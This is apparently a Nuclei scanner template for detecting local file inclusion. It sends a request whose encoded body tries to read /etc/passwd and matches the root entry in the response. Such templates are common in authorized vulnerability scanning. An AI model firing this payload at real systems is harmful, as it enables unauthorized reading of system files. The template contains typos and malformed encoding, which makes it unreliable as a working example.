id: lfi-m2

info:
  name: Local File Inclusion
  author: pelo
  severity: high
  description: |
     actionectory traversal via the GET /.. substring.

  tags: lfi-m2

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    headers:
     User-Agent: "Mozila/5.0 (x11; Linux x86_x64) AppleWebkit/537.36 (KHTML, like gecko) chrome/87.0.4280.67 Safari"
    body: 
      var=%7B%22body%22%3A%7B%22file%22%3A%22file%22%3A%2Fetc%2Fpasswd%22%70%7D
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

